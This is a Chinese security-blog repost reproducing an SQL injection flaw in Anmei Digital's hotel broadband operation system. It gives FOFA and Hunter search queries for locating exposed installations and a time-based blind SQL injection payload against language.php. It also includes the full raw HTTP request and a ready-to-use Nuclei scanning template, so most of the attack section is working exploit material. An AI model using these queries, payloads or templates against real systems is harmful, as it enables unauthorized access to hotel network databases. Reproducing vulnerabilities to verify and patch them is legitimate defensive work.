【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

admin 2024年2月16日11:25:20评论26 views1字数 2176阅读7分15秒阅读模式

资产收集

hunter:web.title=”酒店宽带运营系统”
fofa:title=”酒店宽带运营系统”
【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

页面效果

【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

漏洞复现

  1. 访问language.php。
    【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

  2. payload如下:

EditStatus=2&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20

整体报文如下:

POST /language.php HTTP/1.1Host: xxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Content-Type: application/x-www-form-urlencodedContent-Length: 264EditStatus=2&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20

【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

Nuclei Poc

id: anmeishuzijiudianinfo:  name: anmeishuzijiudian  author: xxxx  severity: info  description: description  reference:    - https://  tags: tagsrequests:  - raw:      - |-        POST /language.php HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Connection: close        Upgrade-Insecure-Requests: 1        Sec-Fetch-Dest: document        Sec-Fetch-Mode: navigate        Sec-Fetch-Site: none        Sec-Fetch-User: ?1        Content-Type: application/x-www-form-urlencoded        Content-Length: 264        EditStatus=2&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'duration>=2'      - type: status        status:          - 200

Nuclie验证

【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

原文始发于微信公众号(零点安全团队):【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月16日11:25:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞https://cn-sec.com/archives/2227279.html

发表评论

匿名网友 填写信息